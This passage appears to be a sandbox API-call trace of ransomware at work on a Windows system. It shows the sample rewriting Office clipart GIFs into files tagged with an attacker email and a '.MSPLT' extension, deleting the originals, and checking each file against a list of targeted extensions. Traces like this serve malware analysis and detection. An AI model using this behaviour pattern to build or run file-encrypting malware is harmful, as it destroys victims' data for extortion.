nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0186.490] SetEndOfFile (hFile=0x368) returned 1 [0186.490] CloseHandle (hObject=0x368) returned 1 [0186.492] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.492] SetEndOfFile (hFile=0x358) returned 1 [0186.493] CloseHandle (hObject=0x358) returned 1 [0186.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.494] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif")) returned 1 [0186.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.494] lstrlenW (lpString=".doc") returned 4 [0186.494] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.494] lstrlenW (lpString=".docx") returned 5 [0186.494] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.494] lstrlenW (lpString=".pdf") returned 4 [0186.494] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.494] lstrlenW (lpString=".xls") returned 4 [0186.494] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.494] lstrlenW (lpString=".xlsx") returned 5 [0186.494] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.494] lstrlenW (lpString=".ppt") returned 4 [0186.494] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.494] lstrlenW (lpString=".zip") returned 4 [0186.494] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.495] lstrlenW (lpString=".rar") returned 4 [0186.495] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.495] lstrlenW (lpString=".bz2") returned 4 [0186.495] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.495] lstrlenW (lpString=".7z") returned 3 [0186.495] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.495] lstrlenW (lpString=".dbf") returned 4 [0186.495] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.495] lstrlenW (lpString=".1cd") returned 4 [0186.495] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.495] lstrlenW (lpString=".jpg") returned 4 [0186.495] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.495] lstrlenW (lpString=".doc") returned 4 [0186.495] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.495] lstrlenW (lpString=".docx") returned 5 [0186.495] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.495] lstrlenW (lpString=".pdf") returned 4 [0186.495] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.495] lstrlenW (lpString=".xls") returned 4 [0186.495] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.495] lstrlenW (lpString=".xlsx") returned 5 [0186.495] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.496] lstrlenW (lpString=".ppt") returned 4 [0186.496] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.496] lstrlenW (lpString=".zip") returned 4 [0186.496] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.496] lstrlenW (lpString=".rar") returned 4 [0186.496] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.496] lstrlenW (lpString=".bz2") returned 4 [0186.496] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.496] lstrlenW (lpString=".7z") returned 3 [0186.496] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.496] lstrlenW (lpString=".dbf") returned 4 [0186.496] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.496] lstrlenW (lpString=".1cd") returned 4 [0186.496] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0186.496] lstrlenW (lpString=".jpg") returned 4 [0186.496] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.496] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.496] lstrlenW (lpString="AG00164_.GIF") returned 12 [0186.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0186.497] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=13254) returned 1 [0186.497] CloseHandle (hObject=0x358) returned 1 [0186.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif")) returned 0x220 [0186.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0186.497] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.497] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0186.498] GetLastError () returned 0x0 [0186.498] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x33c6, lpOverlapped=0x0) returned 1 [0186.560] WriteFile (in: hFile=0x368, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x33d0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x33d0, lpOverlapped=0x0) returned 1 [0186.561] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0186.562] WriteFile (in: hFile=0x368, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0186.562] SetEndOfFile (hFile=0x368) returned 1 [0186.562] CloseHandle (hObject=0x368) returned 1 [0186.565] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.565] SetEndOfFile (hFile=0x358) returned 1 [0186.566] CloseHandle (hObject=0x358) returned 1 [0186.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.567] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif")) returned 1 [0186.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.568] lstrlenW (lpString=".doc") returned 4 [0186.568] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.568] lstrlenW (lpString=".docx") returned 5 [0186.568] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.568] lstrlenW (lpString=".pdf") returned 4 [0186.568] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.568] lstrlenW (lpString=".xls") returned 4 [0186.568] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.568] lstrlenW (lpString=".xlsx") returned 5 [0186.568] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.568] lstrlenW (lpString=".ppt") returned 4 [0186.568] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.568] lstrlenW (lpString=".zip") returned 4 [0186.568] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.568] lstrlenW (lpString=".rar") returned 4 [0186.568] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.568] lstrlenW (lpString=".bz2") returned 4 [0186.568] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.568] lstrlenW (lpString=".7z") returned 3 [0186.568] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.568] lstrlenW (lpString=".dbf") returned 4 [0186.568] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.568] lstrlenW (lpString=".1cd") returned 4 [0186.568] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.569] lstrlenW (lpString=".jpg") returned 4 [0186.569] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.569] lstrlenW (lpString=".doc") returned 4 [0186.569] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.569] lstrlenW (lpString=".docx") returned 5 [0186.569] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.569] lstrlenW (lpString=".pdf") returned 4 [0186.569] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.569] lstrlenW (lpString=".xls") returned 4 [0186.569] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.569] lstrlenW (lpString=".xlsx") returned 5 [0186.569] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.569] lstrlenW (lpString=".ppt") returned 4 [0186.569] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.569] lstrlenW (lpString=".zip") returned 4 [0186.569] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.569] lstrlenW (lpString=".rar") returned 4 [0186.569] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.569] lstrlenW (lpString=".bz2") returned 4 [0186.569] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.569] lstrlenW (lpString=".7z") returned 3 [0186.569] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.570] lstrlenW (lpString=".dbf") returned 4 [0186.571] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.571] lstrlenW (lpString=".1cd") returned 4 [0186.571] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0186.571] lstrlenW (lpString=".jpg") returned 4 [0186.571] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.571] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.571] lstrlenW (lpString="AG00170_.GIF") returned 12 [0186.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0186.576] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=9248) returned 1 [0186.576] CloseHandle (hObject=0x2fc) returned 1 [0186.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif")) returned 0x220 [0186.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0186.578] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.578] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0186.579] GetLastError () returned 0x0 [0186.579] ReadFile (in: hFile=0x394, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x2420, lpOverlapped=0x0) returned 1 [0186.594] WriteFile (in: hFile=0x2e8, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x2430, lpOverlapped=0x0) returned 1 [0186.595] ReadFile (in: hFile=0x394, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0186.595] WriteFile (in: hFile=0x2e8, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0186.596] SetEndOfFile (hFile=0x2e8) returned 1 [0186.601] CloseHandle (hObject=0x2e8) returned 1 [0186.604] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.604] SetEndOfFile (hFile=0x394) returned 1 [0186.605] CloseHandle (hObject=0x394) returned 1 [0186.605] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.606] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif")) returned 1 [0186.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.606] lstrlenW (lpString=".doc") returned 4 [0186.606] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.606] lstrlenW (lpString=".docx") returned 5 [0186.606] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.606] lstrlenW (lpString=".pdf") returned 4 [0186.606] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.606] lstrlenW (lpString=".xls") returned 4 [0186.607] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.607] lstrlenW (lpString=".xlsx") returned 5 [0186.607] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.607] lstrlenW (lpString=".ppt") returned 4 [0186.607] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.607] lstrlenW (lpString=".zip") returned 4 [0186.607] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.607] lstrlenW (lpString=".rar") returned 4 [0186.607] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.607] lstrlenW (lpString=".bz2") returned 4 [0186.607] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.607] lstrlenW (lpString=".7z") returned 3 [0186.607] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.607] lstrlenW (lpString=".dbf") returned 4 [0186.607] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.607] lstrlenW (lpString=".1cd") returned 4 [0186.607] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.607] lstrlenW (lpString=".jpg") returned 4 [0186.607] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.607] lstrlenW (lpString=".doc") returned 4 [0186.607] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.607] lstrlenW (lpString=".docx") returned 5 [0186.608] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.608] lstrlenW (lpString=".pdf") returned 4 [0186.608] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.608] lstrlenW (lpString=".xls") returned 4 [0186.608] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.608] lstrlenW (lpString=".xlsx") returned 5 [0186.608] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.608] lstrlenW (lpString=".ppt") returned 4 [0186.608] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.608] lstrlenW (lpString=".zip") returned 4 [0186.608] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.608] lstrlenW (lpString=".rar") returned 4 [0186.608] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.608] lstrlenW (lpString=".bz2") returned 4 [0186.608] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.608] lstrlenW (lpString=".7z") returned 3 [0186.608] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.608] lstrlenW (lpString=".dbf") returned 4 [0186.608] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.608] lstrlenW (lpString=".1cd") returned 4 [0186.608] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0186.608] lstrlenW (lpString=".jpg") returned 4 [0186.608] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.609] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.609] lstrlenW (lpString="AG00172_.GIF") returned 12 [0186.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0186.609] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=4390) returned 1 [0186.609] CloseHandle (hObject=0x394) returned 1 [0186.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif")) returned 0x220 [0186.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0186.610] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.610] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0186.619] GetLastError () returned 0x0 [0186.619] ReadFile (hFile=0x394, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0) Thread: id = 11 os_tid = 0x1370 [0164.819] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x7ded80 [0164.819] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x7eed88 [0164.820] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ad80 [0164.820] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x79d0a0 [0164.820] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ae88 [0164.820] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x30d1020 [0164.822] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ad50 [0164.822] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76ad50, Size=0x20) returned 0x74e8e0 [0164.822] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af30 [0164.822] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76af30, Size=0x20) returned 0x74e9a8 [0164.823] GetModuleHandleW (lpModuleName="kernel32.dll") returned 